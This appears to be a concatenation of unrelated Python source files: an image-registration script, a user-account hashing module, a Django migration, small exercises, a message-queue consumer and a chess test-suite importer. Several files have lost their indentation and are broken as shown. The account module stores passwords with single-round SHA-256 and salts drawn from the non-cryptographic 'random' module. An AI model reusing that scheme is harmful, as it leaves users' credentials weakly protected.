# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/zyshen/debugs/syn_expr_0422_2']
# # ['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# # '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
# resize_factor = [1, 1, 1] # [80./160.,192./384.,192./384]
# shared_label_set = None
#
for phase in phase_list:
dataset = RegistrationDataset(data_path=os.path.join(data_path, phase), phase=phase, resize_factor=resize_factor)
dataset.set_task_output_path(os.path.join(task_output_path, phase))
dataset.set_data_output_path(os.path.join(data_output_path, phase))
dataset.set_real_data_path(real_img_path, real_label_path)
dataset.set_running_read_path(os.path.join(running_read_path, phase))
if shared_label_set is not None:
dataset.set_shared_label(shared_label_set)
dataset.process()
|
python
|
#-*- coding: utf-8 -*-
"""
security
~~~~~~~~
Generic User class for interfacing with user accounts and
authentication.
"""
import hashlib
import random
from utils import Storage, to36, valid_email, \
ALPHANUMERICS as ALPHAS
username_regex = r'([A-Za-z0-9_%s]){%s,%s}$'
passwd_regex = r'([A-Za-z0-9%s]){%s,%s}$'
class Account(object):
"""The base Account class provides the basic functions for allowing
user account creation and authentication, however it should be
extended to allow user retrieval.
"""
@classmethod
def authenticate(cls, username, passwd, salt, uhash):
"""Authenticates/validates a user's credentials by comparing
their username and password versus their computed salted hash.
A successful authentication results in True, False otherwise.
"""
return cls._roast(username + salt + passwd) == uhash
@classmethod
def register(cls, username, passwd, passwd2=None, salt='', email='', **kwargs):
"""Creates a complete user tuple according to seed
credentials. The input undergoes a salting and roasting during
a hashing process and all values are returned for further db
handling (db insertion, etc). Note: For security reasons,
plaintext passwords are never returned and should not be
stored in a db unless there's a very specific reason to.
XXX: Consider adding the following keyword arguments:
password_validator - lambda for validating passwd (chars, len)
username_validator - lambda for validating username (len, etc)
:param salt: used for testing/verifying hash integrity in tests
:param kwargs: any addt'l info which should be saved w/ the created user
usage:
>>> from waltz import Account
# typically, salt is not provided as an argument and is instead
# generated as a side effect of Account.register("username", "password").
# A salt has been included along with the following function call to
# guarantee idempotence (i.e. a consistent/same uhash with each call)
>>> Account.register("username", "password", salt="123456789")
<Storage {'username': 'username', 'uhash': '021d98a32375ed850f459fe484c3ab2e352fc2801ef13eae274103befc9d0274', 'salt': '123456789', 'email': ''}>
# using additional kwargs, such as age (i.e. age=24) to add user attributes
>>> Account.register("username", "password", salt="123456789", age=24)
<Storage {'username': 'username', 'uhash': '021d98a32375ed850f459fe484c3ab2e352fc2801ef13eae274103befc9d0274', 'salt': '123456789', 'email': '', 'age': 24}>
"""
if not passwd: raise ValueError('Password Required')
if email and not valid_email(email):
raise ValueError("Email '%s' is malformed and does not " \
"pass rfc3696." % email)
if passwd2 and not passwd == passwd2:
raise ValueError('Passwords do not match')
salt = salt or cls._salt()
uhash = cls._roast(username + salt + passwd)
return Storage(zip(('username', 'salt', 'uhash', 'email'),
(username, salt, uhash, email)) + kwargs.items())
@classmethod
def public_key(cls, uid, username, salt):
"""Generates a public key which can be used as a public unique
identifier token in account activation emails and other
account specific situations where you wish to create a url
intended to only work for a specific user.
"""
return cls._roast(uid + username + salt)
@classmethod
def _salt(cls, length=12):
"""http://en.wikipedia.org/wiki/Salt_(cryptography)
Salting results in the generation of random padding of a
specified 'length' (12 default) which can be prepended or
appended to a password prior to hashing to increase security
and prevent against various brute force attacks, such as
rainbow-table lookups."""
return ''.join([random.choice(ALPHAS) for i in range(length)])
@classmethod
def _roast(cls, beans, chash=hashlib.sha256):
"""Computes a hash digest from username, salt, and
password. Hot swappable algo in case there are code changes
down the road."""
return chash(beans).hexdigest()
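
# Hedged usage sketch (not part of the original module): register a user and
# then authenticate against the stored salt/uhash, using only the classmethods
# defined above. The fixed salt keeps the example deterministic.
if __name__ == '__main__':
    user = Account.register("username", "password", salt="123456789")
    assert Account.authenticate("username", "password",
                                user['salt'], user['uhash'])
    assert not Account.authenticate("username", "wrong-password",
                                    user['salt'], user['uhash'])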
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-10-26 11:01
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auth', '0008_alter_user_username_max_length'),
('moving', '0006_auto_20181026_0830'),
]
operations = [
migrations.CreateModel(
name='Booking',
fields=[
('location', models.TextField(max_length=50, null=True)),
('number', models.TextField(max_length=50, null=True)),
('email', models.TextField(max_length=50, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('payment', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='booking', to='moving.Payment')),
],
),
]
|
python
|
import re

S = input()
if re.search(r'^(hi)+$', S):
    print('Yes')
else:
    print('No')
|
python
|
# -*- Mode: Python3; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-

import os
import numpy as np

PATH = "../Images/"

def organize(data):
    # ndArray
    print("Original:")
    print(data[:2])

    # Prepare: reshape the array
    height, width, channels = data.shape
    data = data.flatten()                   # vectorize
    temp = [i for i in data]                # to a plain list
    temp = [temp[i:i+channels] for i in range(0, height * width * channels,
            channels)]                      # group back into pixels

    # Ascending sort
    for c in range(0, channels):
        # sort from the last channel to the first
        i = channels - c - 1
        temp.sort(key=lambda value: value[i])

    npArray = np.array(temp, dtype=np.uint8)
    npArray = npArray.flatten()                         # unpack
    npArray = npArray.reshape(height, width, channels)  # reshape

    print("Result:")
    print(npArray[:2])

def test(filename):
    img_np = PATH + filename + ".npy"
    print("Data: ", img_np)
    if not os.path.exists(img_np):
        print("File not found!")
        return
    data = np.load(img_np)
    organize(data)

if __name__ == '__main__':
    # ndArray
    h, w, c = 5, 4, 3
    numbers = [i for i in range(h*w*c, 0, -1)]
    npArray = np.array(numbers).reshape(h, w, c)
    organize(npArray)

    # ndArray (image)
    test("folha_croton")
|
python
|
from arrp import clear

def test_clear():
    clear("test_dataset")
|
python
|
from multiprocessing import Pool
from .rabbitmq.rmq_consumer import CocoRMQConsumer
from .kafka.kafka_consumer import CocoKafkaConsumer
from .redis.redis_consumer import CocoRedisConsumer
from .logger import logger
import time
# this is a mixture of a consumer factory and a thread pool
class CocoConsumerManager(object):
CONSUMER_CLASS = {
"RMQ": CocoRMQConsumer,
"KAFKA": CocoKafkaConsumer,
"REDIS": CocoRedisConsumer
}
def __init__(self, config, worker_class, pool_size, customized_logger = None):
self._worker_class = worker_class
self._pool = None
self._pool_size = pool_size
self._config = config
if customized_logger:
self._logger = customized_logger
def start(self):
# self._pool = Pool()
# _ = [self._pool.apply_async(CocoConsumerManager._start_consumer,
# args=[x, self._worker_class, self._config]) for x in range(self._pool_size)]
CocoConsumerManager._start_consumer(1, self._worker_class, self._config)
# self._pool.close()
# self._pool.join()
# logger.warning("All progress stopped!")
@staticmethod
def _start_consumer(seq, worker_class, config):
logger.debug('start consumer')
# worker = worker_class(config, seq)
consumer_type = config["MQ_TYPE"]
logger.debug('consumer type: {}'.format(consumer_type))
consumer_class = CocoConsumerManager.CONSUMER_CLASS[consumer_type]
sub_config = config[consumer_type]
# while True:
# try:
# consumer = consumer_class(sub_config, worker_class, logger)
# consumer.connect()
# except Exception as err:
# logger.error(err)
# logger.warning("Consumer Error. Reconnect after 10 seconds.")
# time.sleep(10)
# let the consumer handle reconnecting
consumer = consumer_class(sub_config, worker_class, logger)
consumer.connect()
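
# Hedged usage sketch (the worker class and config values are illustrative,
# not from the original project): the manager expects a config dict whose
# "MQ_TYPE" key selects one of the registered consumer classes above, plus a
# sub-config stored under that same key.
#
#   config = {"MQ_TYPE": "REDIS", "REDIS": {"host": "localhost", "port": 6379}}
#   manager = CocoConsumerManager(config, MyWorkerClass, pool_size=4)
#   manager.start()  # currently runs a single consumer; the pool code is commented out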
|
python
|
# Suites of test positions are normally stored in many different EPD files.
# We keep them in one big JSON file instead, with standardized IDs, because
# that makes it easier to keep track of scores over time.
#
# This program imports a new EPD test suite into that JSON file.
import sys
import json
import chess
import chess.engine

epdfile = sys.argv[1]

all_epd = []
line_idx = 0
refengine = None

with open( epdfile + ".epd" ) as epd:
    for line in epd.readlines():
        line_idx = line_idx + 1
        line = line.strip()

        # Some epd files are passive-aggressive and use 'am' instead of 'bm'
        line = line.replace( "am ", "bm " )

        # Some epd files have no separator between the fen and the best move
        line = line.replace( "bm ", ";bm " )

        # A small number of epd files don't actually *provide*
        # a best move, which seems like it kind of defeats the point,
        # but ok. In these cases we fire up a strong reference engine
        # to get a quick opinion about what looks good. Deeper searches
        # might give us better data here.
        if not 'bm ' in line:
            board = chess.Board( line )
            if not refengine:
                refengine = chess.engine.SimpleEngine.popen_uci( "..\\Engine\\stockfish-10" )
            result = refengine.play( board, chess.engine.Limit( depth=10 ) )
            line = line + ";bm " + str( result.move )

        # After the fen it's all key/value pairs between semicolons
        fields = line.split( ';' )
        if len( fields ) > 0:
            this_test = {}
            fen = fields[0].strip()
            this_test['fen'] = fen
            for meta in fields[1:]:
                meta = meta.strip()
                if len( meta ) > 0:
                    if ' ' in meta:
                        sep = meta.index( ' ' )
                        key = meta[:sep].strip()
                        val = meta[sep:].strip()
                        if val.startswith( '"' ) and val.endswith( '"' ):
                            val = val[1:-1]
                        this_test[key] = val

            # Assign a standardized ID when the suite doesn't provide one
            if not 'id' in this_test:
                this_test['id'] = epdfile.replace( '.', '-' ) + "-" + str( line_idx )

            # Sanity-check that the best move parses (UCI first, then SAN)
            bm = this_test.get( 'bm', '' )
            board = chess.Board( fen )
            try:
                bmove = chess.Move.from_uci( bm )
            except:
                # Eww
                bmove = board.parse_san( bm )

            all_epd.append( this_test )

if refengine:
    refengine.quit()

ser = json.dumps( all_epd, sort_keys = True, indent = 4 )
print( ser )
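
# Hedged illustration (the values below are made up): each entry appended to
# all_epd is a flat dict of the EPD opcodes keyed by name, always including
# 'fen', 'bm' and a standardized 'id', e.g.
#
#   {
#       "fen": "r1bqkbnr/pppp1ppp/2n5/4p3/2B1P3/5N2/PPPP1PPP/RNBQK2R w KQkq -",
#       "bm": "Ng5",
#       "id": "wac-1"
#   }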
|